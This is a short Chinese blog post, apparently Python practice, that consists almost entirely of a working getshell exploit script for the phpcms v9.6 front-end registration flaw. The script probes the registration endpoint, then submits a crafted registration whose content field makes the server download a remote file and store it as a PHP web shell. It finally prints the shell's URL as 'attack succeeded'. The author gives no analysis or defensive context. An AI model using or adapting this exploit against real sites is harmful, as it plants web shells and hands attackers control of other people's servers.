python学习之phpcms exp编写
针对phpcms v9.6 前台注册getshell exp编写,漏洞分析请查看网上分析,不再赘述。
# -*- coding:utf-8 -*-
import re
import string
import requests
import random
import time
def getshell(host):
try:
# print("开始检测漏洞文件是否存在")
time.sleep(5)
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \
(KHTML, like Gecko) Chrome/51.0. 2704.103 Safari/537.36"}
ran=""
for _ in range(8):
ran = ran + random.choice('0123456789zyxwvutsrqponmlkjihgfedcba')
url = host+'/index.php?m=member&c=index&a=register&siteid=1'
if(requests.get(url,header).status_code==200):
print("漏洞文件存在")
time.sleep(1)
print("开始进行漏洞验证")
time.sleep(5)
headers = {
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Upgrade-Insecure-Requests':'1',
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'}
data = "siteid=1&modelid=11&username="+ran+"&password=1123456&email="+ran+"@qq.com&info[content]=src=http://127.0.0.1/1.txt?.php#.jpg&dosubmit=1&protocol="
s = requests.post(url=url,headers=headers,data=data)
s = str(s.content)
shell = re.findall(r'\'src=(.*?)\\\'', s)
print("攻击成功,请访问: \n"+shell[0])
else:
print("检测完毕,漏洞文件不存在!!!")
except:
print ("requests error")
if __name__ == '__main__':
getshell("http://www.phpcms.kk")